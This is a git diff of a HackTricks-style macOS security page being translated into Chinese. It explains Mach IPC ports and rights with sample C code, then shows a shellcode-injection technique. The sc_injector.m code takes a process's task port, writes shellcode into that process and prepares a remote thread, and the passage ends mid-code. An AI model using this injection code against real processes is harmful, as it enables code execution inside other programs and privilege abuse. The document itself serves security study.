-For the next step we need to have defined the **`IOExternalMethodDispatch2022`** struct. It's opensource in [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176), you could define it: +在下一步中,我们需要定义 **`IOExternalMethodDispatch2022`** 结构体。它是开源的,您可以在 [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176) 中找到,您可以定义它:
-Now, following the `(IOExternalMethodDispatch2022 *)&sIOExternalMethodArray` you can see a lot of data: +现在,跟随 `(IOExternalMethodDispatch2022 *)&sIOExternalMethodArray`,您可以看到很多数据:
-Change the Data Type to **`IOExternalMethodDispatch2022:`** +将数据类型更改为 **`IOExternalMethodDispatch2022:`**
-after the change: +更改后:
-And as we now in there we have an **array of 7 elements** (check the final decompiled code), click to create an array of 7 elements: +正如我们现在所看到的,这里有一个 **7 个元素的数组**(检查最终的反编译代码),点击以创建一个 7 个元素的数组:
-After the array is created you can see all the exported functions: +数组创建后,您可以看到所有导出的函数:
> [!TIP] -> If you remember, to **call** an **exported** function from user space we don't need to call the name of the function, but the **selector number**. Here you can see that the selector **0** is the function **`initializeDecoder`**, the selector **1** is **`startDecoder`**, the selector **2** **`initializeEncoder`**... +> 如果您记得,要从用户空间 **调用** 一个 **导出** 函数,我们不需要调用函数的名称,而是 **选择器编号**。在这里,您可以看到选择器 **0** 是函数 **`initializeDecoder`**,选择器 **1** 是 **`startDecoder`**,选择器 **2** 是 **`initializeEncoder`**... {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md index c62c79223..d11a6fa9a 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md @@ -1,113 +1,108 @@ -# macOS IPC - Inter Process Communication +# macOS IPC - 进程间通信 {{#include ../../../../banners/hacktricks-training.md}} -## Mach messaging via Ports +## Mach 消息通过端口 -### Basic Information +### 基本信息 -Mach uses **tasks** as the **smallest unit** for sharing resources, and each task can contain **multiple threads**. These **tasks and threads are mapped 1:1 to POSIX processes and threads**. +Mach 使用 **任务** 作为共享资源的 **最小单位**,每个任务可以包含 **多个线程**。这些 **任务和线程与 POSIX 进程和线程 1:1 映射**。 -Communication between tasks occurs via Mach Inter-Process Communication (IPC), utilising one-way communication channels. **Messages are transferred between ports**, which act like **message queues** managed by the kernel. +任务之间的通信通过 Mach 进程间通信 (IPC) 进行,利用单向通信通道。**消息在端口之间传输**,端口像是由内核管理的 **消息队列**。 -Each process has an **IPC table**, in there it's possible to find the **mach ports of the process**. The name of a mach port is actually a number (a pointer to the kernel object). +每个进程都有一个 **IPC 表**,可以在其中找到 **进程的 mach 端口**。mach 端口的名称实际上是一个数字(指向内核对象的指针)。 -A process can also send a port name with some rights **to a different task** and the kernel will make this entry in the **IPC table of the other task** appear. +一个进程还可以将一个端口名称和一些权限 **发送给不同的任务**,内核会在 **另一个任务的 IPC 表** 中显示这个条目。 -### Port Rights +### 端口权限 -Port rights, which define what operations a task can perform, are key to this communication. The possible **port rights** are ([definitions from here](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)): +端口权限定义了任务可以执行的操作,是这种通信的关键。可能的 **端口权限** 是([定义来自这里](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)): -- **Receive right**, which allows receiving messages sent to the port. Mach ports are MPSC (multiple-producer, single-consumer) queues, which means that there may only ever be **one receive right for each port** in the whole system (unlike with pipes, where multiple processes can all hold file descriptors to the read end of one pipe). - - A **task with the Receive** right can receive messages and **create Send rights**, allowing it to send messages. Originally only the **own task has Receive right over its por**t. -- **Send right**, which allows sending messages to the port. - - The Send right can be **cloned** so a task owning a Send right can clone the right and **grant it to a third task**. -- **Send-once right**, which allows sending one message to the port and then disappears. -- **Port set right**, which denotes a _port set_ rather than a single port. Dequeuing a message from a port set dequeues a message from one of the ports it contains. Port sets can be used to listen on several ports simultaneously, a lot like `select`/`poll`/`epoll`/`kqueue` in Unix. -- **Dead name**, which is not an actual port right, but merely a placeholder. When a port is destroyed, all existing port rights to the port turn into dead names. +- **接收权限**,允许接收发送到端口的消息。Mach 端口是 MPSC(多个生产者,单个消费者)队列,这意味着在整个系统中每个端口只能有 **一个接收权限**(与管道不同,多个进程可以持有一个管道的读端文件描述符)。 +- 拥有 **接收权限** 的 **任务** 可以接收消息并 **创建发送权限**,允许其发送消息。最初只有 **自己的任务对其端口拥有接收权限**。 +- **发送权限**,允许向端口发送消息。 +- 发送权限可以被 **克隆**,因此拥有发送权限的任务可以克隆该权限并 **授予给第三个任务**。 +- **一次性发送权限**,允许向端口发送一条消息,然后消失。 +- **端口集权限**,表示一个 _端口集_ 而不是单个端口。从端口集中出队一条消息会从其包含的一个端口中出队一条消息。端口集可以用于同时监听多个端口,类似于 Unix 中的 `select`/`poll`/`epoll`/`kqueue`。 +- **死名称**,这不是一个实际的端口权限,而仅仅是一个占位符。当一个端口被销毁时,所有现有的对该端口的端口权限变成死名称。 -**Tasks can transfer SEND rights to others**, enabling them to send messages back. **SEND rights can also be cloned, so a task can duplicate and give the right to a third task**. This, combined with an intermediary process known as the **bootstrap server**, allows for effective communication between tasks. +**任务可以将发送权限转移给其他任务**,使其能够发送消息。**发送权限也可以被克隆,因此一个任务可以复制并将权限授予第三个任务**。这与一个称为 **引导服务器** 的中介进程结合,使任务之间的有效通信成为可能。 -### File Ports +### 文件端口 -File ports allows to encapsulate file descriptors in Mac ports (using Mach port rights). It's possible to create a `fileport` from a given FD using `fileport_makeport` and create a FD froma. fileport using `fileport_makefd`. +文件端口允许在 Mac 端口中封装文件描述符(使用 Mach 端口权限)。可以使用 `fileport_makeport` 从给定的 FD 创建一个 `fileport`,并使用 `fileport_makefd` 从 fileport 创建一个 FD。 -### Establishing a communication +### 建立通信 -#### Steps: +#### 步骤: -As it's mentioned, in order to establish the communication channel, the **bootstrap server** (**launchd** in mac) is involved. +如前所述,为了建立通信通道,**引导服务器**(在 mac 中为 **launchd**)参与其中。 -1. Task **A** initiates a **new port**, obtaining a **RECEIVE right** in the process. -2. Task **A**, being the holder of the RECEIVE right, **generates a SEND right for the port**. -3. Task **A** establishes a **connection** with the **bootstrap server**, providing the **port's service name** and the **SEND right** through a procedure known as the bootstrap register. -4. Task **B** interacts with the **bootstrap server** to execute a bootstrap **lookup for the service** name. If successful, the **server duplicates the SEND right** received from Task A and **transmits it to Task B**. -5. Upon acquiring a SEND right, Task **B** is capable of **formulating** a **message** and dispatching it **to Task A**. -6. For a bi-directional communication usually task **B** generates a new port with a **RECEIVE** right and a **SEND** right, and gives the **SEND right to Task A** so it can send messages to TASK B (bi-directional communication). +1. 任务 **A** 发起一个 **新端口**,在此过程中获得 **接收权限**。 +2. 任务 **A**,作为接收权限的持有者,**为该端口生成一个发送权限**。 +3. 任务 **A** 与 **引导服务器** 建立 **连接**,提供 **端口的服务名称** 和 **发送权限**,通过称为引导注册的过程。 +4. 任务 **B** 与 **引导服务器** 交互以执行服务名称的引导 **查找**。如果成功,**服务器复制从任务 A 接收到的发送权限** 并 **将其传输给任务 B**。 +5. 在获得发送权限后,任务 **B** 能够 **构造** 一条 **消息** 并将其 **发送给任务 A**。 +6. 对于双向通信,通常任务 **B** 生成一个带有 **接收** 权限和 **发送** 权限的新端口,并将 **发送权限授予任务 A**,以便其可以向任务 B 发送消息(双向通信)。 -The bootstrap server **cannot authenticate** the service name claimed by a task. This means a **task** could potentially **impersonate any system task**, such as falsely **claiming an authorization service name** and then approving every request. +引导服务器 **无法验证** 任务声称的服务名称。这意味着一个 **任务** 可能会 **冒充任何系统任务**,例如虚假 **声称一个授权服务名称**,然后批准每个请求。 -Then, Apple stores the **names of system-provided services** in secure configuration files, located in **SIP-protected** directories: `/System/Library/LaunchDaemons` and `/System/Library/LaunchAgents`. Alongside each service name, the **associated binary is also stored**. The bootstrap server, will create and hold a **RECEIVE right for each of these service names**. +然后,Apple 将 **系统提供的服务名称** 存储在安全配置文件中,位于 **SIP 保护** 目录:`/System/Library/LaunchDaemons` 和 `/System/Library/LaunchAgents`。每个服务名称旁边,**相关的二进制文件也被存储**。引导服务器将为每个这些服务名称创建并持有 **接收权限**。 -For these predefined services, the **lookup process differs slightly**. When a service name is being looked up, launchd starts the service dynamically. The new workflow is as follows: +对于这些预定义服务,**查找过程略有不同**。当查找服务名称时,launchd 动态启动该服务。新的工作流程如下: -- Task **B** initiates a bootstrap **lookup** for a service name. -- **launchd** checks if the task is running and if it isn’t, **starts** it. -- Task **A** (the service) performs a **bootstrap check-in**. Here, the **bootstrap** server creates a SEND right, retains it, and **transfers the RECEIVE right to Task A**. -- launchd duplicates the **SEND right and sends it to Task B**. -- Task **B** generates a new port with a **RECEIVE** right and a **SEND** right, and gives the **SEND right to Task A** (the svc) so it can send messages to TASK B (bi-directional communication). +- 任务 **B** 发起对服务名称的引导 **查找**。 +- **launchd** 检查任务是否正在运行,如果没有,则 **启动** 它。 +- 任务 **A**(服务)执行 **引导检查**。在这里,**引导** 服务器创建一个发送权限,保留它,并 **将接收权限转移给任务 A**。 +- launchd 复制 **发送权限并将其发送给任务 B**。 +- 任务 **B** 生成一个带有 **接收** 权限和 **发送** 权限的新端口,并将 **发送权限授予任务 A**(服务),以便其可以向任务 B 发送消息(双向通信)。 -However, this process only applies to predefined system tasks. Non-system tasks still operate as described originally, which could potentially allow for impersonation. +然而,这个过程仅适用于预定义的系统任务。非系统任务仍然按照最初描述的方式操作,这可能会允许冒充。 -### A Mach Message +### 一个 Mach 消息 -[Find more info here](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/) - -The `mach_msg` function, essentially a system call, is utilized for sending and receiving Mach messages. The function requires the message to be sent as the initial argument. This message must commence with a `mach_msg_header_t` structure, succeeded by the actual message content. The structure is defined as follows: +[在这里找到更多信息](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/) +`mach_msg` 函数,基本上是一个系统调用,用于发送和接收 Mach 消息。该函数要求将要发送的消息作为初始参数。此消息必须以 `mach_msg_header_t` 结构开始,后面是实际的消息内容。该结构定义如下: ```c typedef struct { - mach_msg_bits_t msgh_bits; - mach_msg_size_t msgh_size; - mach_port_t msgh_remote_port; - mach_port_t msgh_local_port; - mach_port_name_t msgh_voucher_port; - mach_msg_id_t msgh_id; +mach_msg_bits_t msgh_bits; +mach_msg_size_t msgh_size; +mach_port_t msgh_remote_port; +mach_port_t msgh_local_port; +mach_port_name_t msgh_voucher_port; +mach_msg_id_t msgh_id; } mach_msg_header_t; ``` +拥有 _**接收权**_ 的进程可以在 Mach 端口上接收消息。相反,**发送者** 被授予 _**发送**_ 或 _**一次性发送权**_。一次性发送权仅用于发送单个消息,之后它将失效。 -Processes possessing a _**receive right**_ can receive messages on a Mach port. Conversely, the **senders** are granted a _**send**_ or a _**send-once right**_. The send-once right is exclusively for sending a single message, after which it becomes invalid. - -In order to achieve an easy **bi-directional communication** a process can specify a **mach port** in the mach **message header** called the _reply port_ (**`msgh_local_port`**) where the **receiver** of the message can **send a reply** to this message. The bitflags in **`msgh_bits`** can be used to **indicate** that a **send-once** **right** should be derived and transferred for this port (`MACH_MSG_TYPE_MAKE_SEND_ONCE`). +为了实现简单的 **双向通信**,进程可以在名为 _reply port_ (**`msgh_local_port`**) 的 mach **消息头**中指定一个 **mach 端口**,接收该消息的 **接收者** 可以 **回复** 此消息。**`msgh_bits`** 中的位标志可以用来 **指示** 应该为此端口派生并转移一个 **一次性发送** **权**(`MACH_MSG_TYPE_MAKE_SEND_ONCE`)。 > [!TIP] -> Note that this kind of bi-directional communication is used in XPC messages that expect a replay (`xpc_connection_send_message_with_reply` and `xpc_connection_send_message_with_reply_sync`). But **usually different ports are created** as explained previously to create the bi-directional communication. +> 请注意,这种双向通信用于期望回复的 XPC 消息(`xpc_connection_send_message_with_reply` 和 `xpc_connection_send_message_with_reply_sync`)。但 **通常会创建不同的端口**,如前所述,以创建双向通信。 -The other fields of the message header are: +消息头的其他字段包括: -- `msgh_size`: the size of the entire packet. -- `msgh_remote_port`: the port on which this message is sent. -- `msgh_voucher_port`: [mach vouchers](https://robert.sesek.com/2023/6/mach_vouchers.html). -- `msgh_id`: the ID of this message, which is interpreted by the receiver. +- `msgh_size`: 整个数据包的大小。 +- `msgh_remote_port`: 发送此消息的端口。 +- `msgh_voucher_port`: [mach vouchers](https://robert.sesek.com/2023/6/mach_vouchers.html)。 +- `msgh_id`: 此消息的 ID,由接收者解释。 > [!CAUTION] -> Note that **mach messages are sent over a \_mach port**\_, which is a **single receiver**, **multiple sender** communication channel built into the mach kernel. **Multiple processes** can **send messages** to a mach port, but at any point only **a single process can read** from it. - -### Enumerate ports +> 请注意 **mach 消息是通过 \_mach port\_ 发送的**,这是一个内置于 mach 内核的 **单接收者**、**多个发送者** 的通信通道。**多个进程** 可以 **向 mach 端口发送消息**,但在任何时候只有 **一个进程可以从中读取**。 +### 枚举端口 ```bash lsmp -p ``` +您可以通过从 [http://newosxbook.com/tools/binpack64-256.tar.gz](http://newosxbook.com/tools/binpack64-256.tar.gz) 下载此工具来安装它在 iOS 上。 -You can install this tool in iOS downloading it from [http://newosxbook.com/tools/binpack64-256.tar.gz](http://newosxbook.com/tools/binpack64-256.tar.gz) +### 代码示例 -### Code example - -Note how the **sender** **allocates** a port, create a **send right** for the name `org.darlinghq.example` and send it to the **bootstrap server** while the sender asked for the **send right** of that name and used it to **send a message**. +注意 **发送者** 如何 **分配** 一个端口,为名称 `org.darlinghq.example` 创建一个 **发送权限** 并将其发送到 **引导服务器**,同时发送者请求该名称的 **发送权限** 并使用它来 **发送消息**。 {{#tabs}} {{#tab name="receiver.c"}} - ```c // Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html // gcc receiver.c -o receiver @@ -118,66 +113,64 @@ Note how the **sender** **allocates** a port, create a **send right** for the na int main() { - // Create a new port. - mach_port_t port; - kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); - if (kr != KERN_SUCCESS) { - printf("mach_port_allocate() failed with code 0x%x\n", kr); - return 1; - } - printf("mach_port_allocate() created port right name %d\n", port); +// Create a new port. +mach_port_t port; +kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); +if (kr != KERN_SUCCESS) { +printf("mach_port_allocate() failed with code 0x%x\n", kr); +return 1; +} +printf("mach_port_allocate() created port right name %d\n", port); - // Give us a send right to this port, in addition to the receive right. - kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); - if (kr != KERN_SUCCESS) { - printf("mach_port_insert_right() failed with code 0x%x\n", kr); - return 1; - } - printf("mach_port_insert_right() inserted a send right\n"); +// Give us a send right to this port, in addition to the receive right. +kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); +if (kr != KERN_SUCCESS) { +printf("mach_port_insert_right() failed with code 0x%x\n", kr); +return 1; +} +printf("mach_port_insert_right() inserted a send right\n"); - // Send the send right to the bootstrap server, so that it can be looked up by other processes. - kr = bootstrap_register(bootstrap_port, "org.darlinghq.example", port); - if (kr != KERN_SUCCESS) { - printf("bootstrap_register() failed with code 0x%x\n", kr); - return 1; - } - printf("bootstrap_register()'ed our port\n"); +// Send the send right to the bootstrap server, so that it can be looked up by other processes. +kr = bootstrap_register(bootstrap_port, "org.darlinghq.example", port); +if (kr != KERN_SUCCESS) { +printf("bootstrap_register() failed with code 0x%x\n", kr); +return 1; +} +printf("bootstrap_register()'ed our port\n"); - // Wait for a message. - struct { - mach_msg_header_t header; - char some_text[10]; - int some_number; - mach_msg_trailer_t trailer; - } message; +// Wait for a message. +struct { +mach_msg_header_t header; +char some_text[10]; +int some_number; +mach_msg_trailer_t trailer; +} message; - kr = mach_msg( - &message.header, // Same as (mach_msg_header_t *) &message. - MACH_RCV_MSG, // Options. We're receiving a message. - 0, // Size of the message being sent, if sending. - sizeof(message), // Size of the buffer for receiving. - port, // The port to receive a message on. - MACH_MSG_TIMEOUT_NONE, - MACH_PORT_NULL // Port for the kernel to send notifications about this message to. - ); - if (kr != KERN_SUCCESS) { - printf("mach_msg() failed with code 0x%x\n", kr); - return 1; - } - printf("Got a message\n"); +kr = mach_msg( +&message.header, // Same as (mach_msg_header_t *) &message. +MACH_RCV_MSG, // Options. We're receiving a message. +0, // Size of the message being sent, if sending. +sizeof(message), // Size of the buffer for receiving. +port, // The port to receive a message on. +MACH_MSG_TIMEOUT_NONE, +MACH_PORT_NULL // Port for the kernel to send notifications about this message to. +); +if (kr != KERN_SUCCESS) { +printf("mach_msg() failed with code 0x%x\n", kr); +return 1; +} +printf("Got a message\n"); - message.some_text[9] = 0; - printf("Text: %s, number: %d\n", message.some_text, message.some_number); +message.some_text[9] = 0; +printf("Text: %s, number: %d\n", message.some_text, message.some_number); } ``` - {{#endtab}} {{#tab name="sender.c"}} - ```c // Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html // gcc sender.c -o sender @@ -188,67 +181,66 @@ int main() { int main() { - // Lookup the receiver port using the bootstrap server. - mach_port_t port; - kern_return_t kr = bootstrap_look_up(bootstrap_port, "org.darlinghq.example", &port); - if (kr != KERN_SUCCESS) { - printf("bootstrap_look_up() failed with code 0x%x\n", kr); - return 1; - } - printf("bootstrap_look_up() returned port right name %d\n", port); +// Lookup the receiver port using the bootstrap server. +mach_port_t port; +kern_return_t kr = bootstrap_look_up(bootstrap_port, "org.darlinghq.example", &port); +if (kr != KERN_SUCCESS) { +printf("bootstrap_look_up() failed with code 0x%x\n", kr); +return 1; +} +printf("bootstrap_look_up() returned port right name %d\n", port); - // Construct our message. - struct { - mach_msg_header_t header; - char some_text[10]; - int some_number; - } message; +// Construct our message. +struct { +mach_msg_header_t header; +char some_text[10]; +int some_number; +} message; - message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); - message.header.msgh_remote_port = port; - message.header.msgh_local_port = MACH_PORT_NULL; +message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); +message.header.msgh_remote_port = port; +message.header.msgh_local_port = MACH_PORT_NULL; - strncpy(message.some_text, "Hello", sizeof(message.some_text)); - message.some_number = 35; +strncpy(message.some_text, "Hello", sizeof(message.some_text)); +message.some_number = 35; - // Send the message. - kr = mach_msg( - &message.header, // Same as (mach_msg_header_t *) &message. - MACH_SEND_MSG, // Options. We're sending a message. - sizeof(message), // Size of the message being sent. - 0, // Size of the buffer for receiving. - MACH_PORT_NULL, // A port to receive a message on, if receiving. - MACH_MSG_TIMEOUT_NONE, - MACH_PORT_NULL // Port for the kernel to send notifications about this message to. - ); - if (kr != KERN_SUCCESS) { - printf("mach_msg() failed with code 0x%x\n", kr); - return 1; - } - printf("Sent a message\n"); +// Send the message. +kr = mach_msg( +&message.header, // Same as (mach_msg_header_t *) &message. +MACH_SEND_MSG, // Options. We're sending a message. +sizeof(message), // Size of the message being sent. +0, // Size of the buffer for receiving. +MACH_PORT_NULL, // A port to receive a message on, if receiving. +MACH_MSG_TIMEOUT_NONE, +MACH_PORT_NULL // Port for the kernel to send notifications about this message to. +); +if (kr != KERN_SUCCESS) { +printf("mach_msg() failed with code 0x%x\n", kr); +return 1; +} +printf("Sent a message\n"); } ``` - {{#endtab}} {{#endtabs}} -### Privileged Ports +### 特权端口 -- **Host port**: If a process has **Send** privilege over this port he can get **information** about the **system** (e.g. `host_processor_info`). -- **Host priv port**: A process with **Send** right over this port can perform **privileged actions** like loading a kernel extension. The **process need to be root** to get this permission. - - Moreover, in order to call **`kext_request`** API it's needed to have other entitlements **`com.apple.private.kext*`** which are only given to Apple binaries. -- **Task name port:** An unprivileged version of the _task port_. It references the task, but does not allow controlling it. The only thing that seems to be available through it is `task_info()`. -- **Task port** (aka kernel port)**:** With Send permission over this port it's possible to control the task (read/write memory, create threads...). - - Call `mach_task_self()` to **get the name** for this port for the caller task. This port is only **inherited** across **`exec()`**; a new task created with `fork()` gets a new task port (as a special case, a task also gets a new task port after `exec()`in a suid binary). The only way to spawn a task and get its port is to perform the ["port swap dance"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html) while doing a `fork()`. - - These are the restrictions to access the port (from `macos_task_policy` from the binary `AppleMobileFileIntegrity`): - - If the app has **`com.apple.security.get-task-allow` entitlement** processes from the **same user can access the task port** (commonly added by Xcode for debugging). The **notarization** process won't allow it to production releases. - - Apps with the **`com.apple.system-task-ports`** entitlement can get the **task port for any** process, except the kernel. In older versions it was called **`task_for_pid-allow`**. This is only granted to Apple applications. - - **Root can access task ports** of applications **not** compiled with a **hardened** runtime (and not from Apple). +- **主机端口**:如果一个进程对这个端口具有 **发送** 权限,他可以获取 **系统** 的 **信息**(例如 `host_processor_info`)。 +- **主机特权端口**:一个对这个端口具有 **发送** 权限的进程可以执行 **特权操作**,如加载内核扩展。**进程需要是 root** 才能获得此权限。 +- 此外,为了调用 **`kext_request`** API,需要拥有其他权利 **`com.apple.private.kext*`**,这些权利仅授予 Apple 的二进制文件。 +- **任务名称端口**:_任务端口_ 的一个非特权版本。它引用任务,但不允许控制它。通过它似乎唯一可用的功能是 `task_info()`。 +- **任务端口**(又名内核端口):对这个端口具有发送权限可以控制任务(读/写内存,创建线程...)。 +- 调用 `mach_task_self()` 来 **获取** 调用任务的端口名称。此端口仅在 **`exec()`** 之间 **继承**;通过 `fork()` 创建的新任务会获得一个新的任务端口(作为特例,任务在 suid 二进制文件中 `exec()` 后也会获得一个新的任务端口)。生成任务并获取其端口的唯一方法是在执行 `fork()` 时进行 ["端口交换舞"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html)。 +- 访问端口的限制(来自二进制文件 `AppleMobileFileIntegrity` 的 `macos_task_policy`): +- 如果应用具有 **`com.apple.security.get-task-allow` 权限**,来自 **同一用户** 的进程可以访问任务端口(通常由 Xcode 为调试添加)。**公证** 过程不允许其用于生产版本。 +- 具有 **`com.apple.system-task-ports`** 权限的应用可以获取 **任何** 进程的 **任务端口**,除了内核。在旧版本中称为 **`task_for_pid-allow`**。这仅授予 Apple 应用。 +- **Root 可以访问未** 使用 **加固** 运行时编译的应用程序的任务端口(且不是来自 Apple)。 -### Shellcode Injection in thread via Task port +### 通过任务端口在线程中注入 Shellcode -You can grab a shellcode from: +您可以从以下位置获取 shellcode: {{#ref}} ../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md @@ -256,7 +248,6 @@ You can grab a shellcode from: {{#tabs}} {{#tab name="mysleep.m"}} - ```objectivec // clang -framework Foundation mysleep.m -o mysleep // codesign --entitlements entitlements.plist -s - mysleep @@ -264,52 +255,48 @@ You can grab a shellcode from: #import double performMathOperations() { - double result = 0; - for (int i = 0; i < 10000; i++) { - result += sqrt(i) * tan(i) - cos(i); - } - return result; +double result = 0; +for (int i = 0; i < 10000; i++) { +result += sqrt(i) * tan(i) - cos(i); +} +return result; } int main(int argc, const char * argv[]) { - @autoreleasepool { - NSLog(@"Process ID: %d", [[NSProcessInfo processInfo] +@autoreleasepool { +NSLog(@"Process ID: %d", [[NSProcessInfo processInfo] processIdentifier]); - while (true) { - [NSThread sleepForTimeInterval:5]; +while (true) { +[NSThread sleepForTimeInterval:5]; - performMathOperations(); // Silent action +performMathOperations(); // Silent action - [NSThread sleepForTimeInterval:5]; - } - } - return 0; +[NSThread sleepForTimeInterval:5]; +} +} +return 0; } ``` - {{#endtab}} {{#tab name="entitlements.plist"}} - ```xml - com.apple.security.get-task-allow - +com.apple.security.get-task-allow + ``` - {{#endtab}} {{#endtabs}} -**Compile** the previous program and add the **entitlements** to be able to inject code with the same user (if not you will need to use **sudo**). +**编译**之前的程序并添加**权限**以便能够以相同用户注入代码(如果没有,您将需要使用**sudo**)。
sc_injector.m - ```objectivec // gcc -framework Foundation -framework Appkit sc_injector.m -o sc_injector @@ -323,18 +310,18 @@ processIdentifier]); kern_return_t mach_vm_allocate ( - vm_map_t target, - mach_vm_address_t *address, - mach_vm_size_t size, - int flags +vm_map_t target, +mach_vm_address_t *address, +mach_vm_size_t size, +int flags ); kern_return_t mach_vm_write ( - vm_map_t target_task, - mach_vm_address_t address, - vm_offset_t data, - mach_msg_type_number_t dataCnt +vm_map_t target_task, +mach_vm_address_t address, +vm_offset_t data, +mach_msg_type_number_t dataCnt ); @@ -352,177 +339,174 @@ char injectedCode[] = "\xff\x03\x01\xd1\xe1\x03\x00\x91\x60\x01\x00\x10\x20\x00\ int inject(pid_t pid){ - task_t remoteTask; +task_t remoteTask; - // Get access to the task port of the process we want to inject into - kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); - if (kr != KERN_SUCCESS) { - fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr); - return (-1); - } - else{ - printf("Gathered privileges over the task port of process: %d\n", pid); - } +// Get access to the task port of the process we want to inject into +kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); +if (kr != KERN_SUCCESS) { +fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr); +return (-1); +} +else{ +printf("Gathered privileges over the task port of process: %d\n", pid); +} - // Allocate memory for the stack - mach_vm_address_t remoteStack64 = (vm_address_t) NULL; - mach_vm_address_t remoteCode64 = (vm_address_t) NULL; - kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); +// Allocate memory for the stack +mach_vm_address_t remoteStack64 = (vm_address_t) NULL; +mach_vm_address_t remoteCode64 = (vm_address_t) NULL; +kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); - return (-2); - } - else - { +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); +return (-2); +} +else +{ - fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); - } +fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); +} - // Allocate memory for the code - remoteCode64 = (vm_address_t) NULL; - kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); +// Allocate memory for the code +remoteCode64 = (vm_address_t) NULL; +kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); - return (-2); - } +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); +return (-2); +} - // Write the shellcode to the allocated memory - kr = mach_vm_write(remoteTask, // Task port - remoteCode64, // Virtual Address (Destination) - (vm_address_t) injectedCode, // Source - 0xa9); // Length of the source +// Write the shellcode to the allocated memory +kr = mach_vm_write(remoteTask, // Task port +remoteCode64, // Virtual Address (Destination) +(vm_address_t) injectedCode, // Source +0xa9); // Length of the source - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); - return (-3); - } +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); +return (-3); +} - // Set the permissions on the allocated code memory - kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); +// Set the permissions on the allocated code memory +kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr)); - return (-4); - } +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr)); +return (-4); +} - // Set the permissions on the allocated stack memory - kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); +// Set the permissions on the allocated stack memory +kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr)); - return (-4); - } +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr)); +return (-4); +} - // Create thread to run shellcode - struct arm_unified_thread_state remoteThreadState64; - thread_act_t remoteThread; +// Create thread to run shellcode +struct arm_unified_thread_state remoteThreadState64; +thread_act_t remoteThread; - memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); +memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); - remoteStack64 += (STACK_SIZE / 2); // this is the real stack - //remoteStack64 -= 8; // need alignment of 16 +remoteStack64 += (STACK_SIZE / 